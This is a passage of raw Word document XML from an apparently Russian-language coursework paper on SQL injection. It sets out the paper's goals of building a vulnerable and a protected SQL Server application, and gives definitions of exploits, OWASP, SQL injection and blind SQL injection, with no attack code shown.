        </w:rPr>
        <w:t>Атаки данного типа могут быть возможны из-за некорректной обработки входных данных, используемых в SQL-запросах. Разработчик прикладных программ и сайтов, работающих с базами данных, должен знать о уязвимостях такого рода и принимать меры предо</w:t>
      </w:r>
      <w:r w:rsidR="006D3DB3" w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>вращения внедрения SQL-кода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C445E" w:rsidRPr="00F61FB8" w:rsidRDefault="00F61FB8" w:rsidP="002C385A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Цели данной работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3573A" w:rsidRPr="00C3573A" w:rsidRDefault="00C3573A" w:rsidP="00F61FB8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Создать две версии приложения, работающего с базой данных</w:t>
      </w:r>
      <w:r w:rsidR="0096090C">
        <w:t xml:space="preserve"> под управл</w:t>
      </w:r>
      <w:r w:rsidR="0096090C" w:rsidRPr="0096090C">
        <w:t xml:space="preserve">ением </w:t>
      </w:r>
      <w:r w:rsidR="0096090C">
        <w:t xml:space="preserve">СУБД </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0096090C" w:rsidRPr="0096090C">
        <w:t>Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0096090C" w:rsidRPr="0096090C">
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0096090C" w:rsidRPr="0096090C">
        <w:t>Server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, одна из которых будет уязвима для внедрения sql-инъекций, а другая защищена рассматриваемыми в этой работе методами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673E72" w:rsidRPr="00F61FB8" w:rsidRDefault="00673E72" w:rsidP="00F61FB8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F61FB8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучить способы выявления уязвимостей </w:t>
      </w:r>
      <w:r w:rsidR="00F61FB8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F61FB8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>веб-приложениях</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F61FB8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> посредством внедрения sql-инъекций в слабые места собственного приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F61FB8" w:rsidRDefault="00F61FB8" w:rsidP="00F61FB8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучить способы защиты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>веб-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сайтов от внедрения нежелательного sql-кода, защитив собственное приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F61FB8" w:rsidRPr="00F61FB8" w:rsidRDefault="00F61FB8" w:rsidP="002C385A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A515D" w:rsidRPr="00673E7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A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc420854433"/>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sql-Инъекции</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00FB6D02" w:rsidRDefault="00FB6D02" w:rsidP="00A455ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень используемых определений:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="00C3573A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплойт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — программа, фрагмент программного кода или последовательность команд, использующие уязвимости в коде сайта или программном обеспечении сервера используемые для проведения атаки на сайт или сервер. Целью атаки может быть как получение контроля над сайтом, так и нарушение его функционирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3573A" w:rsidRPr="00C3573A" w:rsidRDefault="004D6608" w:rsidP="00C3573A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OWASP) - это открытый проект обеспечения безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Сообщество OWASP включает в себя корпорации, образовательные организации и частных лиц со всего мира. Сообщество работает над созданием статей, учебных пособий, документации, инструментов и технологий, находящихся в свободном доступе.</w:t>
      </w:r>
      <w:r w:rsidR="00C3573A" w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3573A" w:rsidRDefault="00C3573A" w:rsidP="00C3573A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>structured</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — «язык</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> структурированных запросов») </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - формальный непроцедурный язык программирования, применяемый для создания, модификации и управления данными в произвольной реляционной базе данных, управляемой соответствующей системой управления базами данных (СУБД).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3573A" w:rsidRDefault="002510B4" w:rsidP="00C3573A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002510B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-инъекция — это атака, направленная на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002510B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002510B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, в ходе которой конструируется SQL-выражение из пользовательского ввода путем простой конкатенации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002510B4" w:rsidRPr="00C3573A" w:rsidRDefault="002510B4" w:rsidP="00C3573A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002510B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002510B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql-инъекция - это обычная SQL-инъекция, за исключением того, </w:t>
      </w:r>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>уязвимый запрос является неко</w:t>
      </w:r>
      <w:r w:rsidR="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>торой логикой работы приложения и</w:t>
      </w:r>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не позволяет вывести какие-либо данные в возвращаемую Web-приложением страницу.</w:t>
      </w:r>
      <w:r w:rsidRPr="002510B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование этой техники</w:t>
      </w:r>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> основывается на использовании логических выражений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00195233" w:rsidRPr="00195233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Если выражение истинно, то Web-приложение вернет одно содержимое, а если выражение является ложным, то другое.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="004D6608" w:rsidRDefault="00A852C0" w:rsidP="009A31ED">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В сфере </w:t>
      </w:r>
      <w:r w:rsidR="004D6608" w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>безопасности интернет технологий</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> существует разновидность </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D6608" w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, с которыми сравнительно легко бороться, но которые</w:t>
      </w:r>
      <w:r w:rsidR="00A92A4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> тем не менее занимают первую позицию в рейтинге </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Top</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 организации OWASP: это т. н. SQL-инъекции — атаки посредством внедрения злонамеренного кода на языке SQL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Structured</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Query</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Language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). Хотя эта разновидность атак существует с 1995 года, она остается одной из самых распространенных угроз для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб</w:t>
      </w:r>
      <w:r w:rsidR="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
